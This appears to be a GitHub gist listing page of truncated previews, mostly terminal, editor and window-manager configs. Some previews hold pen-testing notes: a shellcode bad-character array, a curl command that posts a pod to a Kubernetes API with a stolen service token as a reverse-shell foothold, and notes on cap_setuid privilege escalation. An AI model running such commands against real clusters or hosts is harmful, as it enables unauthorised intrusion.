dualfade

View Bad Char Array --
bc = bytearray (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d"
b"\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a"
b"\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27"
b"\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34"
b"\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41"
b"\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e"
b"\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b"
b"\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68"
b"\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75"
View gist:f55ff9ac0aa4adfc31c24f952e8b4e42
[2] % gtfo -b tar
_ _ _ __
_| || |_ | | / _|
|_ __ _| __ _| |_| |_ ___
_| || |_ / _` | __| _/ _ \
|_ __ _| | (_| | |_| || (_) |
|_||_| \__, |\__|_| \___/
__/ |
|___/
View docker ufw --
BlackArch / ArchLinux Latest --
Docker UFW issues --
docker.json update --
% cat /etc/docker/daemon.json
{
"iptables": false
}
ufw default fwd policy update --
View neovim-init.vim blackarch --
# spacevim pissing me off --
# moving to neovim-init / blackarch --
# orig --
# https://github.com/Optixal/neovim-init.vim
# refs --
# https://github.com/neoclide/coc.nvim
# https://github.com/VundleVim/Vundle.vim
Note:
View kubernetes pod injection --
Post request to cluster --
Most articles talked about using "default" as the namespace;
this target needed a very specific namespace to be used because of the token and privileges.
% curl -sk -v -H 'Authorization: Bearer eyJhbHbiOiJSUzI1NiIsImtpZCI6InpR[full_jwt]4bGRe83bt6f_jPs1RXMKt3RnQd5ugveZfw' 'https://poc.somehackeddomain.com:6443/api/v1/namespaces/HACKED_NAMESPACE/pods' -H 'Content-Type: application/json' -d @5h3ll3x.json
yaml pod template --
Convert to json for proper injection --
Obviously you have to have enough privileges to use hostPath --
This particular pen-test aws was breached compromising the kube-system jwt and then the json reverse shell was
View dot screenrc
# GNU Screen - main configuration file
# Allow bold colors - necessary for some reason
attrcolor b ".I"
# Tell screen how to set colors. AB = background, AF=foreground
termcapinfo xterm 'Co#256:AB=\E[48;5;%dm:AF=\E[38;5;%dm'
# Enables use of shift-PgUp and shift-PgDn
termcapinfo xterm|xterms|xs|rxvt ti@:te@
View termite config --
# ~/.config/termite/config
[options]
allow_bold = true
font = Hack Nerd Font 8
icon_name = termite
scrollback_lines = 10000
[colors]
foreground = #c0c5ce
View Caps --
file with cap_setuid+ep ??
user with perms to make it so == root
Just some notes --
[user@lemur tmp]$ hostname ; id
lemur
uid=1001(user) gid=1001(user) groups=1001(user)
[user@lemur tmp]$ sudo -l
Matching Defaults entries for user on this host:
View blackarch awesome rofi
Disable std modkey r --
enable rofi --
-- Prompt
-- awful.key({ modkey }, "r", function () mypromptbox[mouse.screen.index]:run() end),
-- Run program (d for dmenu ;)
awful.key({ modkey }, "d",
function()
awful.spawn.with_shell("rofi -matching fuzzy -show combi")
View gist:f7f7e9ed7389ae2e9152042fb73c63c1
# ~/.config/termite/config
[options]
allow_bold = true
clickable_url = true
font = Hack Nerd Font 8
geometry = 700x520
icon_name = terminal
scrollback_lines = 10000
browser = lynx